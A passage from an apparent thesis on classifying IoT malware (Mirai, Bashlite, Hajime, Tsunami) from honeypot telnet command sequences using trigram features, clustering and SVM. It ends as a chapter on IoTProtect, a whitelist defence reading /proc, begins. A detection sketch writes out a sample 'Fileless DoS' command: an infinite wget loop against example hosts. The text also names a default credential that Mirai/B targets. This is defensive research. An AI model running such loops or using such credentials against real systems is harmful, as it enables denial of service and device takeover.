measures, the columns under “M-Z” the distance between Mirai and ZORRO, and so on. We
determined that cosine was the best distance for distinguishing ECTs, with trigram just slightly
lower. However, we found a few command sequences in the same session containing both Bashlite
and nttpd signatures. The Bashlite source code has been leaked, so other
attackers can copy its functions, including its command sequences, into their own malware [15].
As a result, some malware executes command sequences carrying the signatures of multiple
categories. Because cosine distance cannot
distinguish this combined type of Bashlite command sequence, trigram provides a better solution
for combined or mixed command sequences. Moreover, the source code for Mirai has similarly
been leaked [74]. Based on the distance measure results, we chose trigram for use in this study.
Table 14 Distance measures for different malware labels (average).
Distance/category B-N B-M B-Z N-M N-Z M-Z
Cosine 0.9686 0.9492 0.9958 0.9990 1.0000 0.9516
Trigram 0.9086 0.9436 0.9230 0.9516 0.9661 0.9351
NLCS 0.7864 0.8888 0.8621 0.8895 0.9266 0.8642
MLCS 0.8367 0.9307 0.8971 0.9299 0.9472 0.9132
NLD 0.8795 0.9358 0.9118 0.9336 0.9585 0.9197
Jaro-Winkler 0.5238 0.6001 0.5615 0.5457 0.5851 0.4710
Table 15 Distance measures for different malware labels (minimum).
Distance/category B-N B-M B-Z N-M N-Z M-Z
Cosine 0.0163 0.7259 0.2929 0.5736 0.9678 0.1783
Trigram 0.4048 0.6968 0.1111 0.6667 0.6481 0.6197
NLCS 0.2500 0.5748 0.1429 0.4118 0.5556 0.3734
MLCS 0.3529 0.5893 0.1667 0.5455 0.6000 0.4048
NLD 0.3929 0.6857 0.1667 0.5455 0.6667 0.5318
Jaro-Winkler 0.2167 0.3217 0.0978 0.3119 0.2933 0.2251
Malware category Feature extraction. N-gram is an algorithm based on computational
linguistics and probability [75], which can be used to estimate the likelihood of a sentence
occurring at all or following a given word. N-gram can also provide efficient approximate string
matching. Using N-gram to index lexicon terms, a signature file can be compressed to a smaller
size. Moreover, N-gram can be used to calculate the similarity between two strings [76].
In this method, we used N-gram to collect ECT occurrence patterns. For each malware category,
we collected the top 10 N-gram features, representing the major behavior in each category, and
presented them as a histogram. These features were all based on a trigram model, namely, n = 3.
We calculated the trigram histogram using four months of data for two categories. The command
sequence distributions of Bashlite, Mirai, and Satori are shown in Fig. 15, 16, and 17, respectively.
Based on the common command patterns of each malware category, we found that Bashlite tended
to contain “cd,” “sh,” and “rm” behavior, Mirai often contained terms such as “busybox,” “cat,”
and “echo,” and Satori tended to use terms such as “&&,” “cp,” and “busybox.” The results
indicated that trigram could assist in revealing distinctive attack patterns among different IoT
malware categories.
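The per-category feature extraction described above amounts to counting trigrams over all ECTs of one category and keeping the most frequent ones. A minimal sketch, assuming ECTs are plain strings and using a hypothetical helper name `top_trigrams`:

```python
from collections import Counter


def top_trigrams(ects, k=10):
    """Return the k most frequent character trigrams across a list of ECTs."""
    counts = Counter()
    for ect in ects:
        counts.update(ect[i:i + 3] for i in range(len(ect) - 2))
    return counts.most_common(k)


# Toy ECTs for illustration only; they are not taken from the dataset.
for gram, count in top_trigrams(["ccccctsw", "cctsw"], k=3):
    print(gram, count)
```

The resulting (trigram, count) pairs are what a histogram such as those in Fig. 15 to 17 would plot for each category.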
Fig. 15 Trigram statistics of Bashlite IoT malware.
Fig. 16 Trigram statistics of Mirai IoT malware.
Fig. 17 Trigram statistics of Satori IoT malware.
To find the best n for n-gram similarity on our compressed data, we calculated the
bigram, trigram, and 4-gram distances between Bashlite and Mirai ECTs. We ran
the calculation on both a general case and a worst case, choosing the 500 longest ECTs from Mirai
and Bashlite as the worst-case data. Table 16 and Table 17 show the distance and time cost for each
n. For the top 500 ECTs, trigram takes only 21 seconds and yields a distance close to that of
4-gram, whereas bigram takes 20 seconds and yields a shorter distance than trigram. For
the 500 longest ECTs, bigram takes the least time and yields a distance about 0.01 shorter than
trigram and 4-gram; trigram takes 73 seconds longer than bigram. Therefore, bigram is good
enough for the worst case, and trigram is suitable for the top 500 ECTs. In this method, we
chose trigram as our measurement for ECTs.
Table 16 Distance measures for different n-gram between Bashlite and Mirai
Bashlite - Mirai Bigram Trigram 4-gram
Top 500 ECTs 0.937090 0.943678 0.944708
Longest 500 ECTs 0.930650 0.940600 0.945393
Table 17 Time cost for different n-gram between Bashlite and Mirai
Bashlite - Mirai Bigram Trigram 4-gram
Top 500 ECTs 20 sec 21 sec 24 sec
Longest 500 ECTs 466 sec 539 sec 569 sec
5.2.3. Data analysis
The complete analytical process is illustrated in Fig. 18. First, command sequences were
extracted from pcap files, filtering for infection command sequences. Next, the command
sequence was encoded to create ECTs, and then the N-gram model was used to extract trigram
features from them. Finally, classification and clustering analysis was performed to determine
malware categories and new patterns.
Fig. 18 Data analysis flow
Clustering algorithms. Cyber attacks in IoT keep evolving, and the pattern of attacks
is uncertain. Therefore, we chose the hierarchical clustering method because it does not require
the number of clusters to be predefined. To identify new patterns, we chose a single-linkage
hierarchical clustering algorithm, which is sensitive to outliers. The hierarchical clustering method works
by successively combining individual data into clusters [77]. To our knowledge, the use of
clustering algorithms on malware-related datasets was introduced by Bailey et al. [78], who also
employed hierarchical clustering.
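As a rough illustration of single-linkage clustering on ECTs, the sketch below groups strings whose trigram distance is at most a threshold. It relies on the fact that cutting a single-linkage dendrogram at height t yields the connected components of the graph that links every pair at distance ≤ t, so a union-find structure is enough. This is a standard-library sketch rather than the SciPy-based code used in the study, and the threshold value and toy ECTs are illustrative assumptions.

```python
from collections import Counter


def trigram_distance(x, y):
    """Trigram (Dice) distance between two strings, using multiset trigrams."""
    tx = Counter(x[i:i + 3] for i in range(len(x) - 2))
    ty = Counter(y[i:i + 3] for i in range(len(y) - 2))
    total = sum(tx.values()) + sum(ty.values())
    if total == 0:
        return 0.0 if x == y else 1.0
    return 1.0 - 2.0 * sum((tx & ty).values()) / total


def single_linkage_clusters(items, threshold, distance=trigram_distance):
    """Flat clusters obtained by cutting a single-linkage dendrogram at `threshold`."""
    parent = list(range(len(items)))

    def find(i):
        # Find the cluster representative, halving the path on the way up.
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    # Merge every pair that lies within the threshold (O(n^2) comparisons).
    for i in range(len(items)):
        for j in range(i + 1, len(items)):
            if distance(items[i], items[j]) <= threshold:
                parent[find(i)] = find(j)

    clusters = {}
    for i, item in enumerate(items):
        clusters.setdefault(find(i), []).append(item)
    return list(clusters.values())


# Toy ECTs for illustration only.
ects = ["ccccctsw", "cccctsw", "BEBEBq", "BEBEq"]
for cluster in single_linkage_clusters(ects, threshold=0.5):
    print(cluster)
```

Because one close pair is enough to merge two groups, an unusual ECT stays in its own cluster until the threshold grows large, which is the outlier sensitivity that makes single linkage useful for spotting new patterns.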
Classification algorithms. We transformed the telnet logs into a smaller dataset of ECTs.
However, the trigram model still generated hundreds of features. According to our trigram statistics,
some Linux commands occur in a tightly fixed order; for example, malware typically uses "cd" to
move to a writable folder and then downloads files via "wget" or "tftp" commands.
In text categorization research, Joachims [79] showed that SVM can handle high-dimensional
input spaces with few irrelevant features. In contrast, the Naive Bayes classifier assumes that the
distributions of different terms are independent of each other. Even though the independence
assumption is false in many real-world applications, Naive Bayes performs surprisingly well [80].
Therefore, we chose SVM as our classification algorithm and the Naive Bayes classifier as the
baseline. By conducting the same experiments with these two algorithms, we could determine
which was better for our research.
• Naive Bayes
Naive Bayes classifiers assume that an attribute value’s effect on a given class is independent of
the values of other attributes; this is called “class-conditional independence” [81]. The Naive
Bayes classifier greatly simplifies learning by assuming that features are independent given class.
Although independence is generally a poor assumption, in practice Naive Bayes often competes
well with more sophisticated classifiers [82].
• Support Vector Machines
SVM is a useful technique of data classification, whose aim is to produce a model that predicts
the target values of the test data based solely on their attributes [79]. Given a training set of
instance–label pairs (xi, yi), i = 1, …, l, where xi ∈ R^n and yi ∈ {1, −1}, SVM requires the solution
of the following optimization problem:
$$\min_{w, b, \xi} \; \frac{1}{2} w^{T} w + C \sum_{i=1}^{l} \xi_i$$
$$\text{subject to } y_i (w^{T} \varphi(x_i) + b) \geq 1 - \xi_i, \quad \xi_i \geq 0, \quad i = 1, \dots, l,$$
where C > 0 is the penalty parameter of the error term and K(xi, xj) ≡ φ(xi)^T φ(xj) is called the
kernel function. Many kinds of kernel function
are available, such as linear, polynomial, and sigmoid. For our dataset, we chose a linear kernel
function according to our ECT numbers [78][79].
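To illustrate how the baseline classifier operates on trigram features, the following is a small multinomial Naive Bayes written with the standard library only. It is a sketch under stated assumptions, not the classifier used in the experiments: the class name `TrigramNaiveBayes`, the add-one smoothing with one extra slot for unseen trigrams, and the toy labels are all hypothetical.

```python
from collections import Counter, defaultdict
from math import log


def trigram_counts(ect):
    """Count the character trigrams in one ECT string."""
    return Counter(ect[i:i + 3] for i in range(len(ect) - 2))


class TrigramNaiveBayes:
    """Multinomial Naive Bayes over trigram counts (illustrative sketch)."""

    def fit(self, ects, labels):
        self.class_counts = Counter(labels)
        self.feature_counts = defaultdict(Counter)
        for ect, label in zip(ects, labels):
            self.feature_counts[label].update(trigram_counts(ect))
        self.vocabulary = {g for counts in self.feature_counts.values() for g in counts}
        return self

    def predict(self, ect):
        total_docs = sum(self.class_counts.values())
        # Add-one smoothing; the extra +1 reserves probability mass for
        # trigrams that never appeared in training (an assumption of this sketch).
        smoothing_slots = len(self.vocabulary) + 1
        best_label, best_score = None, float("-inf")
        for label, n_docs in self.class_counts.items():
            counts = self.feature_counts[label]
            denominator = sum(counts.values()) + smoothing_slots
            # Log prior plus the sum of independent per-trigram log likelihoods.
            score = log(n_docs / total_docs)
            for gram, k in trigram_counts(ect).items():
                score += k * log((counts[gram] + 1) / denominator)
            if score > best_score:
                best_label, best_score = label, score
        return best_label


# Toy training data with hypothetical labels.
model = TrigramNaiveBayes().fit(
    ["ccccctsw", "cccctsw", "BEBEBq", "BEBEq"],
    ["family_a", "family_a", "family_b", "family_b"],
)
print(model.predict("ccctsw"))
```

The per-trigram terms are simply added in log space, which is exactly where the class-conditional independence assumption enters; an SVM with a linear kernel would instead learn one weight per trigram jointly.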
Classification evaluation. We used a confusion matrix and accuracy to measure the
classification result. Given a target category, let TP (true positive) be the number of ECTs
correctly classified as the target category, FN (false negative) the number of sequences from the
target category misclassified as another, TN (true negative) the number of sequences
from other categories that are correctly classified, and FP (false positive) the number of sequences
incorrectly classified as the target category. The precision (P) is defined as precision = TP / (TP +
FP), and the recall rate (R) is defined as recall = TP / (TP + FN). The F-score is the
harmonic mean of P and R and provides a balance between them: F-score = 2PR / (P + R).
The F-score assists in identifying a threshold of similarity. Accuracy (A) is defined as accuracy =
(TP + TN) / (TP + FP + FN + TN), and the error rate is defined as error rate = (FP + FN) / (TP + FP
+ FN + TN) [77].
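These definitions translate directly into code. The helper below is a small sketch with a hypothetical function name; returning 0.0 when a denominator is zero is an assumption of the sketch, and the counts in the usage line are made up for illustration.

```python
def classification_metrics(tp, fp, fn, tn):
    """Precision, recall, F-score, accuracy and error rate from confusion counts."""
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    if precision + recall:
        f_score = 2 * precision * recall / (precision + recall)
    else:
        f_score = 0.0
    total = tp + fp + fn + tn
    accuracy = (tp + tn) / total if total else 0.0
    error_rate = (fp + fn) / total if total else 0.0
    return {
        "precision": precision,
        "recall": recall,
        "f_score": f_score,
        "accuracy": accuracy,
        "error_rate": error_rate,
    }


# Illustrative counts only, not taken from the experiments.
print(classification_metrics(tp=8, fp=2, fn=2, tn=8))
```

Since the F-score is a harmonic mean, it always lies between precision and recall, which gives a quick sanity check on reported per-class figures.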
5.3. Experiments
5.3.1. Dataset and Environment
Data collection for classification was undertaken from December 2016 to September 2017. The
dataset contained data for 284 days from physical IoT devices in the IoTPOT. As illustrated in
Table 18, the dataset included 2.7 million infection command sequences related to malware that
we downloaded to another server in real time. These sequences could be reduced to 44,843 unique
command sequences through correlation and deduplication. Moreover, our encoding method was
able to reduce the command sequences to 2,925 ECTs. To discover hidden patterns, we chose the
data for a one-month period as dataset 2 for the clustering experiment.
Table 18 Dataset for analysis.
Dataset | Number of infection command sequences | Rearranged command sequences | Number of unique ECTs | Time interval | Analysis
1 | 2,756,231 | 44,843* | 2,925 | 2016/12/07~2017/09/16 | NB, SVM
2 | 422,591 | 95,448** | 4,626 | 2017/04/01~2017/04/30 | Hierarchical clustering
* Correlating malware binaries, extracting command sequences that download binaries, and conducting
data deduplication
** Extracting command sequences and conducting data deduplication
DrWeb was used to scan the malware binaries, after which malware labels and corresponding
ECTs could be obtained. The distribution of labels is shown in Table 19, indicating that the
majority of malware in the IoTPOT came from Bashlite and Mirai.
Table 19 Malware categories and ECTs' distribution.
Label | Bashlite | Mirai | Hajime | Tsunami
Number of ECTs | 665 | 3408 | 155 | 58
Number of malware | 2755 | 2665 | 34 | 162
From Dec. 7th, 2016 to Sept. 16th, 2017, our honeypot collected 1.36 terabytes (TB) of pcap
files. We extracted 22.9 gigabytes (GB) of telnet logs on a server with a ten-core Intel 2.20 GHz CPU,
62 GB RAM, and a 4 TB disk. This task was scheduled to run automatically every day. Processing
the full 1.36 TB of pcap files takes about eight days. The other time costs of our method are shown in Table
20. Data preprocessing begins by filtering infection commands from the telnet logs. To filter and
label the malware-related telnet logs in dataset 1, we used Google BigQuery [83] to process the 22.9
GB of telnet logs. ECT transformation and the machine learning algorithms were run on a
machine with two quad-core Intel 3.70 GHz CPUs, 16 GB RAM, and a 1 TB disk. SciPy 0.18.1
[84] was used to support the clustering and classification algorithms.
Table 20 Statistics of time cost.
Algorithm | Set | Data preprocessing | Feature extraction | Clustering/Classification | Total
SVM | 1 | 174 mins 1 secs | 21 secs | 20 secs | 174 mins 42 secs
Naïve Bayes | 1 | 174 mins 1 secs | 21 secs | 15 secs | 174 mins 37 secs
Hierarchical Clustering | 2 | 13 secs | 73 mins 21 secs | 1 mins 5 secs | 74 mins 39 secs
5.3.2. Clustering Experiments
The hierarchical clustering method involves successively combining individual data into
clusters. We conducted a hierarchical clustering analysis using dataset 2. As shown in Fig. 19, the
algorithm separated 4,636 ECTs into 30 clusters according to the trigram distance. We labeled the
clusters according to antivirus engine scan results of malware binaries or with reference to
malware analysis reports from cybersecurity researchers. Detailed text features of malware families
are summarized in Appendix A.
Our method successfully differentiated three known malware families and their variants and
also discovered one new cyber attack pattern in IoT, called “Fileless DoS.” Although the four
best-known malware families are Mirai, Bashlite, Hajime, and Tsunami, Tsunami employs Linux
commands in a similar manner to Bashlite and was therefore assigned to the leaf cluster named "(10)". The
MD5s of the Tsunami samples that share the Bashlite infection pattern are shown in Appendix B.
X-axis: ECT index number # or cluster size (*)
The clustering results helped to discover the following malware variants and new cyber attack
pattern:
• Mirai/A and Bashlite/A are malware variants that truncate ptmx files after login. The ptmx
file is used to create a pseudoterminal master–slave pair [85]. Both Mirai/A and Bashlite/A
contain this command, and the maximum distance to separate them must be less than 0.58.
• Mirai/B targets devices with weak default credentials whose login ID is root or Admin and whose
password is 5up, such as TP-Link (TL-WR740N) [86]. The Mirai/B commands are more
straightforward than those of the original Mirai. For example, Mirai/B does not check device
partitions with commands such as cat /proc/mounts [66].
• Fileless DoS is a shell script that employs an infinite while loop and multiple wget
commands to mount a DoS attack. Downloaded web contents are sent to /dev/null, and thus
no binaries are stored in devices. A total of 934 Fileless DoS ECTs were discovered in April
2017. The top ten victim websites are shown in Table 21, including those of a music band,
a construction company, and an IT solutions company.
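The three traits that characterize Fileless DoS (an infinite while loop, wget commands, and output discarded to /dev/null) suggest a simple screening heuristic for raw command sequences. The sketch below is an assumption-laden illustration, not the detection method of this study, which found the pattern through clustering; the regular expressions, the function name, and the sample strings are hypothetical.

```python
import re

# Heuristic patterns (assumptions): the loop spellings and the wget match are
# illustrative and would need tuning against real telnet logs.
INFINITE_LOOP = re.compile(r"\bwhile\s+(?:true|:)\s*;")
WGET_CALL = re.compile(r"\bwget\b")


def looks_like_fileless_dos(command_sequence):
    """Flag sequences that loop forever over wget and discard the output."""
    return (
        INFINITE_LOOP.search(command_sequence) is not None
        and WGET_CALL.search(command_sequence) is not None
        and "/dev/null" in command_sequence
    )


# Hypothetical sample sequences using reserved example domains.
looping = (
    "while true; do wget http://example.com/ -O /dev/null; "
    "wget http://example.org/ -O /dev/null; done"
)
download = "cd /tmp; wget http://example.com/a.sh; sh a.sh"
print(looks_like_fileless_dos(looping), looks_like_fileless_dos(download))
```

A rule like this could pre-filter sessions once the pattern is known, whereas the clustering step is what surfaces such a pattern in the first place.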
Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017
Table 21 Victims of Fileless DoS.
Victim websites Counts
http://fxxxxxxxx.com:80 7111
http://xxx.xxx.80.118:80 5669
http://www.txxxxxxxxxxxx.com:80 2722
http://www.hxxxxxxxx.co.il:80 2564
http://www.bxxxxxxxxxxxxxxxxxxxxx.com:80 2354
http://www.kxxxxxxxxxxxxxxxxxxxxxxxxx.de:80 1982
http://txxxxxxxxxxx.com:80 1980
http://www.axxxxx.dk:80 1878
http://xxx.xxx.19.69:80 1843
http://cxxxxxxxxxxxxxxxxxx.com:80 1749
5.3.3. Classification Experiments
Because the data amounts varied greatly among categories, we designed two experiments to
identify whether data bias affected classification accuracy. Two datasets were prepared for our
experiments. The first contained 1000 ECT types per malware category; Bashlite, Hajime, and
Tsunami data were repeated up to 1000. The second dataset contained all ECT types from every
category. Our program randomly chose 50% of the data as a training set and then tested the
remaining 50%. To avoid selecting only Mirai data, however, we randomly chose the training
dataset for the second experiment. The precision and recall scores are listed in Table 22, Table 23,
Table 24, and Table 25.
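The two sampling schemes can be sketched as follows. This is an illustrative reading of the setup, with hypothetical helper names: `oversample` repeats a category's ECTs cyclically until the target size (1000 in the first experiment) is reached, and `split_half` performs the random 50/50 split into training and test sets. The fixed seed is an assumption added for reproducibility.

```python
import random
from itertools import cycle, islice


def oversample(items, target):
    """Repeat items cyclically until exactly `target` entries are available."""
    return list(islice(cycle(items), target))


def split_half(items, seed=0):
    """Shuffle a copy of items and split it into two halves (train, test)."""
    rng = random.Random(seed)
    shuffled = list(items)
    rng.shuffle(shuffled)
    middle = len(shuffled) // 2
    return shuffled[:middle], shuffled[middle:]


# Toy data for illustration only.
balanced = oversample(["ect_a", "ect_b", "ect_c"], target=7)
train, test = split_half(balanced)
print(len(balanced), len(train), len(test))
```

Note that repeating samples before splitting means copies of the same ECT can land in both halves, which should be kept in mind when comparing the even-sampling and random-sampling results.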
Table 22 Classification performance of even sampling- Naive Bayes.
label precision recall f1-score support
Bashlite 0.87 0.89 0.88 513
Mirai 0.83 0.77 0.80 499
Hajime 1.00 1.0 1.00 476
Tsunami 0.70 0.74 0.72 512
avg / total 0.85 0.85 0.85 2000
Table 23 Classification performance of even sampling- SVM.
label precision recall f1-score support
Bashlite 1.0 0.87 0.93 513
Mirai 0.85 0.75 0.80 499
Hajime 1.0 1.0 1.0 476
Tsunami 0.70 0.87 0.78 512
avg / total 0.89 0.87 0.87 2000
Table 24 Classification performance of random sampling- Naive Bayes.
label precision recall f1-score support
Bashlite 0.88 0.93 0.91 155
Mirai 0.98 0.99 0.99 1225
Hajime 0.94 1.0 0.97 60
Tsunami 0.00 0.00 0.00 24
avg / total 0.95 0.97 0.96 1464
Table 25 Classification performance of random sampling- SVM.
label precision recall f1-score support
Bashlite 0.92 0.94 0.95 155
Mirai 0.98 1.0 0.99 1225
Hajime 1.0 1.0 1.0 60
Tsunami 0.00 0.00 0.00 24
avg / total 0.96 0.98 0.97 1464
Based on the results of these experiments, SVM performed better than Naive Bayes. However,
Tsunami was easily misclassified as Bashlite. We believe that second-stage training is necessary
for real cases. Such reinforcement learning, also called active learning, involves fine-tuning the
model during the training process. Therefore, based on the prediction results for Bashlite and
Tsunami, we further developed a sub-training approach by adding an additional feature (file size)
and performing sub-classifier training. As shown in Table 26, the precision of Tsunami
classification improved because its file sample metadata differed from that of Bashlite. Using
additional features can thus help to prevent misidentifying classes that share the same command
line pattern, without requiring static and dynamic analyses and simply by looking at the command
line and file meta-information. Mirai’s open source code provides hackers with an entry point for
developing new variants. It has been noted that hackers rely on known or zero-day
vulnerabilities when developing new Mirai variants to attack IoT devices [87]. Hence, these
variants may introduce new patterns of ECTs.
Table 26 Precision/recall of SVM – second stage (reinforcement learning).
label precision recall f1-score support
Bashlite 0.99 0.99 0.99 155
Mirai 0.98 1.00 0.99 1225
Hajime 1.0 1.0 1.00 60
Tsunami 0.90 0.86 0.88 24
Avg / total 0.96 0.98 0.97 1464
5.4. Discussion
For IoT malware that attacks via the telnet protocol, our clustering experiments show that our
method can find a new cyber attack, "Fileless DoS," as well as changes introduced by malware
variants. Moreover, our trigram features aid the classification of IoT malware. Comparisons with
previous studies are as follows:
• The method proposed by Ham et al. [25] relies on features of the network, phone, message,
CPU, battery, and memory for each process on Android devices. However, it is hard to extend
IoT devices or install third-party packages on them. Our method only analyzes the telnet traffic
between attacker and victim devices and requires no modification of the IoT devices.
• Azmoodeh, Dehghantanha, and Choo [26] analyzed the OpCode sequence and applied a deep
Eigenspace learning approach to classify malicious and benign applications. Their method
achieves 99.68% accuracy. However, the OpCode sequence is generated from malware
binaries, and IoT malware such as Mirai and Bashlite may remove its binaries after
execution. Moreover, many IoT devices use flash storage, and rebooting erases the
malware binaries. In contrast, our method does not need to convert binaries to OpCode and
graphs; it infers the malware family from telnet traffic and achieves 96.70% accuracy.
• Su et al. [27] investigated a lightweight method of detecting DDoS malware in IoT
environments. They converted binaries to grayscale images and then classified IoT malware
families with a convolutional neural network. The system achieved 94.0% accuracy in
goodware and DDoS malware classification and 81.8% accuracy in classification of
goodware and the two main malware families. Su's method examines only the Mirai and Bashlite
families, whereas our method examines four malware families and achieves 96.70% accuracy.
In this method, we used physical IoT devices as honeypots to obtain the dataset. These devices
are known to have been targeted by IoT malware, and in that sense we believe that the dataset
provides a partial view of real cyber attacks against IoT devices in the wild. We cannot claim that
the dataset represents all attacks in IoT, as we have only a limited number of honeypot
devices. However, we believe the study is meaningful, as the honeypot was indeed able to
observe and capture samples from four major IoT malware families targeting IoT telnet services,
and the proposed method was able to discover evolving attacks such as Fileless DoS.
The limitations of our method may come from the attack vector of IoT malware:
(1) Our method does not analyze HTTP or SSH protocol.
(2) Our method might be affected if hackers intentionally add parts of other malware codes to
their malware.
Chapter 6.
IoTProtect: Highly Deployable Whitelist-based Protection for
Low-cost Internet-of-Things Devices
6.1. Introduction
The Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and
buildings, embedded with electronics, sensors, and network connectivity. Connectivity enables
these objects to collect and exchange data for further applications and business use. However, a
threat from IoT malware has materialized. In Oct. 2016, an IoT malware called Mirai, reported
to have infected over 100,000 IoT devices such as Internet Protocol (IP) cameras,
conducted the largest ever distributed denial of service (DDoS) attack against Dyn DNS [2]. We
have been using IoTPOT [4], a honeypot that monitors attacks on IoT devices, to observe cyber
attacks against such devices and analyze the threats from IoT malware. As shown in Fig. 20, the
number of attacking hosts, many of which are indeed IoT devices compromised and misused by
attackers, has increased rapidly since Aug. 2016.
Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017
Our observations show that most of the compromised devices are home routers [88] and IP
cameras [89]. Although many security vendors have developed commercial anti-virus software
for embedded systems, such as those listed in Table 27, these are not suitable for protecting the
above-mentioned low-cost devices as a result of resource constraints and unsupported platforms.
Moreover, all of the commercial products require substantial modification of the firmware that
would incur high engineering costs, especially if the manufacturer wants to deploy the security
product on existing products.
Table 27 Commercial secure software against embedded systems.
Product name | Supported platform | Min. resource constraint | Other constraint
McAfee Embedded Control 6.x [90] | RHEL 4/5/6/7; CentOS 5/6/7; SuSE 10/11; Open SuSE 10/11; Solaris 9/10; WEPOS, POSReady 2009; Windows Embedded Systems (WES) 2009; Windows XP/vista/7/8; Windows NT/2000/2003/2008 | 512 MB RAM; 80 MB free disk space | Rebuild kernel module [94]
Kaspersky Embedded Systems Security 2.0 [91] | Windows xp/7/8/10; WEPOS 2009/7; WES xp/7/8; Windows 10 Redstone; Windows 10 IoT Ent | 256 MB RAM; 50 MB free disk space | N/A
Trend Micro OfficeScan 10.6 [92] | WEPOS 2009/7; WES XP/vista/7 | 256MB RAM; 350 MB free disk space | N/A
Symantec Critical System Protection 5.2 (Agent) [93] | RHEL 5/6; CentOS 5/6; SUSE 8/9/10/11; Solaris 10/11; Oracle 5/6; QNX; IBM AIX 5L; HP Unix 11; WEPOS, 2009/7; WES xp/7; Windows XP/vista/7/8; Windows 2003/2008/2012 | 256 MB RAM; 100 MB free disk space | Additional management server [95]
In addition to commercial security software, many studies address the
protection of low-cost IoT devices [35]. Because they also require firmware modifications,
their deployment costs are similar to those of the commercial options.
6.2. Preliminaries
6.2.1. Linux process information
Linux is a free OS developed by many companies and groups. The GNU/Linux system is the
core component, which is branched off into many different Linux distributions [96]. Among these
distributions, such as Fedora, Ubuntu, Debian, and Mandriva Linux, there is a common design
called the “proc” filesystem for providing system information to users or applications. This
filesystem is not associated with any hardware device such as a disk drive. Instead, “proc” is an
interface to the running Linux kernel. Files in the “proc” filesystem are objects that behave
similarly to normal files but provide access to parameters, data structures, and statistics in the
kernel. The contents of these files are not always fixed, but are generated on the fly by the Linux
kernel when the file is read. For embedded Linux systems, developers can use open-source tools such
as the Yocto Project to build their own distribution [97]. Yocto retains support for the
“proc” and “sys” filesystems [98]. Therefore, users and applications can read process
information through “proc” on an embedded Linux system as long as the device developers
enable it.
The “proc” filesystem contains a directory entry for each process running on a Linux system.
The name of each directory is the process identifier (ID) of the corresponding process. These
directories appear and disappear dynamically as processes start and terminate on the system. Each
directory contains several entry files providing information regarding the running process [99].
There are three entry files that contain pathname or filename information regarding the binary of
the corresponding process:
• The “exe” file is a symbolic link that points to the executable image running in the process.
• The “maps” file lists the address ranges in the process’s address space into which
files are mapped, the permissions on these addresses, the names of the mapped files, and other
information.
• The “cmdline” file records the complete command line for the process unless the process is
a zombie or a kernel thread. For a zombie process, the file is empty [100].
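As a minimal sketch of how the “cmdline” entry can be consumed, the following Python snippet splits its raw content into arguments. It relies on the fact that the kernel separates the arguments with NUL bytes; the function name and the sample command line are illustrative assumptions and are not part of IoTProtect.

```python
from typing import List


def parse_cmdline(raw: bytes) -> List[str]:
    """Split the raw bytes of /proc/[pid]/cmdline into its arguments.

    The arguments are separated by NUL bytes. An empty file is what a
    zombie process reports, so it yields an empty list.
    """
    if not raw:
        return []
    # Drop the trailing NUL terminator, then split on the separators.
    parts = raw.rstrip(b"\x00").split(b"\x00")
    return [part.decode("utf-8", errors="replace") for part in parts]


# Illustrative content, as a telnet daemon might report it (made up).
sample = b"/usr/sbin/telnetd\x00-l\x00/bin/login\x00"
args = parse_cmdline(sample)
```

On a live system the raw bytes would come from opening “/proc/[pid]/cmdline” in binary mode.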
As shown in Fig. 21, users and applications can find the pathname of the binary behind a running process
from these entries. Moreover, given a whitelist of benign binaries' pathnames, we can distinguish normal from
abnormal processes.
Fig. 21 Format of the maps [100]
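To illustrate how pathnames can be read from the maps format, the sketch below extracts the pathname field from each line and skips anonymous mappings and pseudo-paths such as “[heap]”. The helper names and the sample content (addresses, device numbers, inodes) are assumptions made for illustration; the actual prototype uses shell commands rather than Python.

```python
from typing import Optional, Set


def maps_pathname(line: str) -> Optional[str]:
    """Return the pathname field of one /proc/[pid]/maps line, if any.

    Each line holds: address range, permissions, offset, device, inode,
    and an optional pathname. Anonymous mappings leave the pathname
    blank, and pseudo-paths such as [heap] or [stack] are not files.
    """
    fields = line.split(None, 5)  # the pathname itself may contain spaces
    if len(fields) < 6:
        return None  # blank pathname: anonymous mapping
    path = fields[5].strip()
    if not path or path.startswith("["):
        return None  # pseudo-path such as [heap], [stack], [vdso]
    return path


def pathnames_from_maps(text: str) -> Set[str]:
    """Collect the distinct file pathnames mapped by one process."""
    found = set()
    for line in text.splitlines():
        path = maps_pathname(line)
        if path is not None:
            found.add(path)
    return found


# Illustrative maps content (all values are made up).
SAMPLE_MAPS = """\
00008000-000a3000 r-xp 00000000 1f:02 118 /bin/busybox
000aa000-000ab000 rw-p 0009a000 1f:02 118 /bin/busybox
000ab000-000cd000 rw-p 00000000 00:00 0 [heap]
40000000-40005000 rw-p 00000000 00:00 0
40005000-40060000 r-xp 00000000 1f:02 201 /lib/libc.so.0
"""

mapped_files = pathnames_from_maps(SAMPLE_MAPS)
```

The resulting set of pathnames is what would be compared against a pathname whitelist.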
6.2.2. Files in IoT devices
In this method, we focus on Linux-based IoT devices because many open-source OSs for IoT
devices are based on Linux distributions, such as Brillo, OpenWrt, and Ostro Linux [101]. Linux
has a single hierarchical directory structure that starts from the root directory, represented by “/”,
and then expands into sub-directories. The Filesystem Hierarchy Standard (FHS) defines the
directory structure and contents in most Linux distributions [102]. However, IoT devices use
various storage media such as flash memory, and a single device can contain multiple
filesystems. For example, the ASUS Wi-Fi router RT-AC3200 mounts nine
filesystems, according to the “/proc/mounts” file shown in Fig. 22. The format and meaning of
each line are as follows [100] [103]:
1. The first field specifies the device that is mounted.
2. The second field specifies the mount point.
3. The third field specifies the filesystem type.
4. The fourth field lists the mount options, including whether the filesystem is mounted
read-only (ro) or read-write (rw).
5. The fifth field is used by the “dump” command to determine which filesystems are to be
dumped.
6. The sixth field is used by the “fsck” command to determine the order in which filesystem
checks are performed at boot time.
Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200
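The six-field layout described above can be parsed with a few lines of Python. This is a sketch under stated assumptions: the `Mount` type, the function name, and the sample lines are hypothetical and do not reproduce the actual content of Fig. 22.

```python
from typing import List, NamedTuple


class Mount(NamedTuple):
    device: str         # field 1: mounted device
    mount_point: str    # field 2: mount point
    fs_type: str        # field 3: filesystem type
    options: List[str]  # field 4: mount options such as ro or rw
    dump: int           # field 5: used by the dump command
    fsck_order: int     # field 6: order of fsck checks at boot


def parse_mounts(text: str) -> List[Mount]:
    """Parse the content of /proc/mounts into Mount records."""
    mounts = []
    for line in text.splitlines():
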